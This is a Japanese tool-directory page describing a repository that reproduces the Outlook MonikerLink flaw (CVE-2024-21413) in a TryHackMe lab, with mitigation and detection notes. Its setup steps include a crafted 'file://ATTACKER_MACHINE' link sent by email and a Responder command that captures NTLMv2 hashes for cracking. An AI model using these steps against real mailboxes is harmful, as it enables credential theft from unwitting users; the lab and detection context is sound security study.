Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/gurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc
パスワードクラッキング脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubgurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc

CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

このリポジトリには、CVE-2024-21413に関する研究ノートとハイレベルな概念実証(PoC)が含まれています。CVE-2024-21413は、メッセージに埋め込まれたSMB/モニカー形式のリンクを処理する際に、特定のメールクライアントで観察される脆弱性です。ここに記載されているPoCと実験は、管理されたラボ環境のシステム上で実施されました。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
239ヶ月前未レビュー

💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

🧩 概要

このプロジェクトは、完全に隔離されたTryHackMe環境でMonikerLinkの動作(CVE-2024-21413)を再現し、特定のハイパーリンク形式がOutlookにリンクを処理させ、認証試行の漏えいやさらなる悪用につながる可能性があることを示します。成果物はPoCと、セキュリティチームが適用できる優先順位付けされた緩和策および検出の提案です。稼働中または許可されていないシステムは標的にしていません。


⚙️ ツールと技術

ツール / スキル目的
Pythonスクリプト開発
Linux (Kali)ターゲットシステム
Metasploit悪用とアクセス
TryHackMe Lab管理された環境

🚀 セットアップと実行

  • 攻撃マシンのLinuxでターミナルを開く
    • Pythonファイルを作成し、コードを貼り付けた exploit.py

      このコードはCMNaticによって書かれたもので、こちらにあります。

    • 自分のマシンの環境に合わせてコードを修正した。

      例えば、次の行“<a href=“file://ATTACKER_MACHINE/test!”の“ATTACKER_MACHINE”を攻撃マシンのIPアドレスに置き換え、“server = smtplib.SMTP('MAILSERVER', 25)”の行では“MAILSERVER”を被害者マシンのIPアドレスに変更した。

    • その後、exploit.pyファイルを実行し、「the email has been sent」という応答を得た。
    • netNTLMv2(John the Ripperなどのツールで復号でき、平文パスワードを取得できるハッシュ)を捕獲するため、responderというツールを使用して被害者マシンからの応答をキャプチャした。responderを実行するコマンドは次のとおり。

      responder -I ens5

      • ここで-Iはインターフェースを意味し、私はens5インターフェースを使用した。私の場合、コマンドはエラーを表示したため、まず次のコマンドを使用してから上記のコマンドを再試行したところ、うまくいった。

        systemctl start systemd-resolved

  • 次に被害者マシンにログインした。
    • Outlookを開き、攻撃マシンから送信したメール内のリンクを開いた。
  • これにより、リンクを1回クリックするだけで、攻撃マシン上のresponderがnetNTLMv2ハッシュを捕獲できた。 netNTLMv2 hash

この概念実証は、Microsoft Outlookのリンク処理における微妙な問題を浮き彫りにします。SMBリソースを参照する特定のfile://形式のモニカーリンクは、Outlookの標準的なフィルタリングをすり抜け、外部への認証試行を引き起こす可能性があります。ここで示した動作は完全に管理されたTryHackMeラボで再現されたものであり、一見無害に見えるリンク形式がネットワーク通信を覆い隠す可能性があることを強調しています。ベンダーのパッチと検出ガイダンスは提供されていますが、モニカー/fileスキームの正当な使用法があるため、その根底にある仕組みは依然として複雑です。重要なのは、このPoCによって生成されるアクティビティがネットワークレベルで観測可能であり(たとえば、NTLM認証試行を示すパケットキャプチャなど)、フォレンジック分析やインシデント調査に適していることです。

検出

Florian Rothによって、:file:\\:要素を含むメールを検出するYaraルールが作成されています。 Wireshark image

ツールをダウンロード